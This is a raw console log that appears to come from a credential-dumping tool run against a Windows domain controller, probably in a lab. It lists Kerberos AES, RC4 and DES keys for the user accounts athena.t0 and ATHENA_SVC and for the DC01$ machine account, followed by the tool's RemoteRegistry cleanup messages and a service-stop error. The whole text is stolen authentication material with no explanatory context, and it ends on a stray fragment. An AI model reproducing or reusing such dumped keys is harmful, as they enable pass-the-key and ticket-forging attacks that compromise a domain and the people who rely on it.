DRY.MARTINI.BARS\athena.t0:0x14:54eb9e1180c0285453533d176b3be7617d1fedb9f06091e73e2e5fd9b8215160
DRY.MARTINI.BARS\athena.t0:0x13:0137cc7731a76b1d1dc50564410e7cf6
DRY.MARTINI.BARS\athena.t0:aes256-cts-hmac-sha1-96:8d4ed2234bb59fc1ca26dc088be3898b4049b2908a4f72c9e531036a9756c979
DRY.MARTINI.BARS\athena.t0:aes128-cts-hmac-sha1-96:746057ac92411bf547e6ea27c7a4a99a
DRY.MARTINI.BARS\athena.t0:0x17:5f4ae3ddff03f730dd0f1ab97f5849eb
DRY.MARTINI.BARS\ATHENA_SVC:0x14:0ce1d6094d25abd2b9894883bdfced0da53e93a33c6013ce0fb7214873754419
DRY.MARTINI.BARS\ATHENA_SVC:0x13:24298886655586580fa8dc97a7dbd1f6
DRY.MARTINI.BARS\ATHENA_SVC:aes256-cts-hmac-sha1-96:726be946b26085fe0e21c3603b7a4648d14f5dafa0859f0e0bfca047b828e8fa
DRY.MARTINI.BARS\ATHENA_SVC:aes128-cts-hmac-sha1-96:d58ac3c4825b34faff4ece06402d9f6d
DRY.MARTINI.BARS\ATHENA_SVC:0x17:5f4ae3ddff03f730dd0f1ab97f5849eb
DC01$:0x14:5aa82cbda736f4fb52d59881898941f422c07fd252c12fb1c1bebc420bcf79da
DC01$:0x13:58e969a77e71791daea4199e5790c13b
DC01$:aes256-cts-hmac-sha1-96:cfdd5f8fcded79093957c01af085cdfa0ae934a027dbb8638e98564e56d43330
DC01$:aes128-cts-hmac-sha1-96:99d7889b6c8f96d5351f6390d8f8c33a
DC01$:0x17:bc793bbfe2d1082e8f82d89205cccc65
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on
.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Path

